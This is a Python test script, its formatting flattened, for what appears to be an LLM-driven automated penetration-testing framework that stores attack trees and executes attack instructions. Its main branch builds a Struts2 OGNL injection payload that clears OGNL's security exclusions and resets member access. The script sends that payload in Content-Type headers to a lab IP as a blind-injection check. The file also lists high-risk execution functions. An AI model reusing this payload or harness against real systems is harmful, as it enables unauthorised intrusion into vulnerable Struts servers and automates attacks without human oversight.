import re import subprocess import tempfile import os import pexpect import struct import sys import mysql.connector import requests from mycode.LLMManager import LLMManager from mycode.TaskObject import TaskObject from myutils.PickleManager import g_PKM from mycode.InstructionManager import g_instrM from mycode.TaskManager import g_TaskM from mycode.PythonTManager import PythonTManager from myutils.ConfigManager import myCongif import textwrap class Mytest: def update_node_inter(self,attack_index): attack_tree = g_PKM.ReadData(attack_index) nodes = attack_tree.traverse_dfs() # 06-0=>p instr = nodes[6].get_instr_user().pop(0) nodes[6].parent.get_instr_user().append(instr) # 39-1 instr = nodes[39].get_instr_user().pop(1) nodes[39].parent.get_instr_user().append(instr) # 49-0 instr = nodes[49].get_instr_user().pop(0) nodes[49].parent.get_instr_user().append(instr) g_PKM.WriteData(attack_tree, attack_index) if __name__ == "__main__": # 示例使用 mytest = Mytest() LLM = LLMManager(1) PythonM = PythonTManager(myCongif.get_data("Python_max_procs")) current_path = os.path.dirname(os.path.realpath(__file__)) print(current_path) test_type = 1 task_id = 16 task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip",None) if test_type == 1: # # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen'] str_instr = '''python-code import requests def dynamic_fun(): # 基于布尔条件的盲注检测 true_condition = "'test'=='test'" false_condition = "'test'=='wrong'" payload_template = ( "%{(#_='multipart/form-data')." "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." "(#_memberAccess?(#_memberAccess=#dm):" "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])" ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))" ".(#ognlUtil.getExcludedPackageNames().clear())" ".(#ognlUtil.getExcludedClasses().clear())" ".(#context.setMemberAccess(#dm))))." f"(#result=@java.lang.Boolean@parseBoolean({{}}))}}" ) try: # 发送真条件请求 true_payload = payload_template.format(true_condition) r_true = requests.get( 'http://192.168.204.137', headers={'Content-Type': true_payload}, timeout=10 ) # 发送假条件请求 false_payload = payload_template.format(false_condition) r_false = requests.get( 'http://192.168.204.137', headers={'Content-Type': false_payload}, timeout=10 ) # 对比响应差异 if r_true.status_code != r_false.status_code: return (True, f'Different status codes detected (True: {r_true.status_code} vs False: {r_false.status_code})') if len(r_true.content) != len(r_false.content): return (True, f'Content length difference detected (True: {len(r_true.content)} vs False: {len(r_false.content)})') return (False, 'No observable differences between true/false conditions') except Exception as e: return (False, f'Request failed: {str(e)}') ''' #str_instr = str_instr.strip() + " --max-time 10" dedented_code = textwrap.dedent(str_instr.strip()) #对多shell指令的情况进行处理--也有风险 if "python-code" not in dedented_code: if "&&" in dedented_code: dedented_code = task_Object.mill_instr_preprocess(dedented_code, "&&") elif "||" in dedented_code: dedented_code = task_Object.mill_instr_preprocess(dedented_code, "||") instr, reslut, source_result, ext_params = g_instrM.execute_instruction(dedented_code) else: instr, reslut, source_result, ext_params = PythonM.execute_instruction(dedented_code) print("----执行结果----") print(reslut) elif test_type == 2: #给节点添加指令 g_TaskM.load_tasks() task = g_TaskM.tasks[task_id] nodes = task.attack_tree.traverse_dfs() cur_node = nodes[78] commands = [ ] for cmd in commands: cur_node.add_instr(cmd) cur_node.update_work_status(1) #保存数据 g_PKM.WriteData(task.attack_tree,str(task.task_id)) elif test_type ==3: #按格式读取指令 pass elif test_type == 4: # 修改Messages attact_tree = g_PKM.ReadData("6") # 创建一个新的节点 from mycode.AttackMap import TreeNode testnode = TreeNode("test", 0) LLM.build_initial_prompt(testnode) # 新的Message systems = testnode.messages[0]["content"] # print(systems) # 遍历node,查看有instr的ndoe nodes = attact_tree.traverse_bfs() for node in nodes: node.messages[0]["content"] = systems g_PKM.WriteData(attact_tree, "6") print("完成Messgae更新") else: pass